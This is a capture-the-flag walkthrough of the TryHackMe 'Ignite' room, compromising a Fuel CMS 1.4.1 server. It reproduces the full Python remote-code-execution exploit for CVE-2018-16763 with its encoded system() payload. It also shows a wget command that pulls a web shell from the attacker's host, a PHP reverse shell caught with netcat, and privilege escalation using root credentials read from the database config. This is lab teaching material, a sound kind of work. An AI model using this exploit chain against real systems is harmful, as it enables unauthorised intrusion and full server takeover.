TryHackMe - Ignite
Enumeration
nmap
root@kali:~/Security/TryHackMe/ignite# portscan 10.10.164.23
Open ports: 80
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 16:05 EDT
Nmap scan report for 10.10.164.23
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-title: Welcome to FUEL CMS
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.52 seconds
HTTP
Navigating to http://http://10.10.164.23/, we get a Getting Started page for Fuel CMS with some useful information in how the database is set up. However /fuel/application/config/database.php is forbidden with our permissions. robots.txt already told us about /fuel/ but, the home page explicitly tells us:
To access the FUEL admin, go to:
http://10.10.164.23/fuel
User name: admin
Password: admin (you can and should change this password and admin user information after logging in)
At http://http://10.10.164.23/fuel, we have a login form which opens with the provided admin:admin credentials. Based on the site_docs, we have a couple places to try setting up a reverse shell: Pages, Layouts, and Assets.
Before we go too far, let’s search for a exploit for fuelCMS v1.4:
root@kali:~/Security/TryHackMe/ignite# searchsploit fuelCMS
------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
fuelCMS 1.4.1 - Remote Code Execution | exploits/linux/webapps/47138.py
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
After copying the exploit to our working directory, we need to change the url variable and comment out the provided proxy since we aren’t using Burp Suite.
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
import requests
import urllib
# url = "http://127.0.0.1:8881"
url = "http://10.10.164.23"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
# proxy = {"http":"http://127.0.0.1:8080"}
# r = requests.get(burp0_url, proxies=proxy)
r = requests.get(burp0_url)
html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
print r.text[0:dup]
Gaining RCE Access
The script works, but prints out unnecessary HTML. It’s a bit clunky, but we can confirm we are www-data and grab the usr flag from /home/www-data/flag.txt. Since this is a bit clunky and the connection keeps dropping, we should use phpbash.php.
Getting a Shell
# Attacker
root@kali:~/scripts/phpbash# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.164.23 - - [31/Aug/2020 14:01:59] "GET /phpbash.php HTTP/1.1" 200 -
# Victim
cmd:"wget http://10.2.37.2:8000/phpbash.php"
Navigate to http://10.10.164.23/phpbash.php:
www-data@ubuntu:/var/www/html# cat /home/www-data/flag.txt
{censored}
Escalating Privileges
We were told that the database config file can be found in fuel/application/config/database.php, so let’s see if we can grab some credentials.
www-data@ubuntu:/var/www/html# cat /fuel/application/config/database.php
...
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
...
www-data@ubuntu:/var/www/html# su root
su: must be run from a terminal
We may have root credentials, but we cannot check since we need to spawn a TTY shell to run su. Seems phpbash.php was fun but is pretty unstable, so let’s wget a standard reverse shell.
root@kali:~/scripts# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.164.23 - - [31/Aug/2020 15:10:02] "GET /php-reverse-shell.php HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
root@kali:~/scripts# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.2.37.2] from (UNKNOWN) [10.10.164.23] 47428
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
12:14:27 up 1:23, 0 users, load average: 1.02, 0.98, 0.91
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@ubuntu:/$ su root
su root
Password: mememe
root@ubuntu:/# cat /root/root.txt
cat /root/root.txt
{censored}
I hope you enjoyed the walkthrough.